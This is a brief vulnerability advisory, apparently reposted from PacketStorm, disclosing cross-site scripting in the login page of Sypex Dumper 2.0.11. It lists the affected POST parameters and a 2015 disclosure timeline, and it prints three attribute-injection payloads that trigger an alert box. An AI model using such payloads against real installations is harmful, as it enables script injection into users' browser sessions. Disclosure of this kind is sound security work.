Sypex Dumper 2.0.11 Cross Site Scripting

Posted on Posted in Exploit

Sypex Dumper version 2.0.11 suffers from multiple cross site scripting vulnerabilities.

Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-SYPEX0529.txt

Vendor:
https://sypex.net


Product:
Sypex Dumper 2.0.11 is a PHP web based MySQL database management system.


Advisory Information:
================================================
Sypex Dumper 2.0.11 XSS Vulnerabilities

XSS

Vulnerability Details:
=====================
Login page input fields are vulnerable to XSS via POST method.
Allowing remote attackers to execute arbitrary code in the
context of an user's browser session.


Exploit code(s):
===============

host="onMouseOver="alert(666);
pass="onMouseOver="alert(666);
user="onMouseOver="alert(666);


Disclosure Timeline:
=========================================================


Vendor Notification:  May 27, 2015
May 29, 2015: Public Disclosure



Severity Level:
=========================================================
Med


Description:
==========================================================

Request Method(s):
                                [+] POST

Vulnerable Product:
                                [+] Sypex Dumper 2.0.11

Vulnerable Parameter(s):
                                [+] host, pass, user

Affected Area(s):
                                [+] Login page

===============================================================

(hyp3rlinx)

Quelle: PacketStorm

Facebooktwittergoogle_plus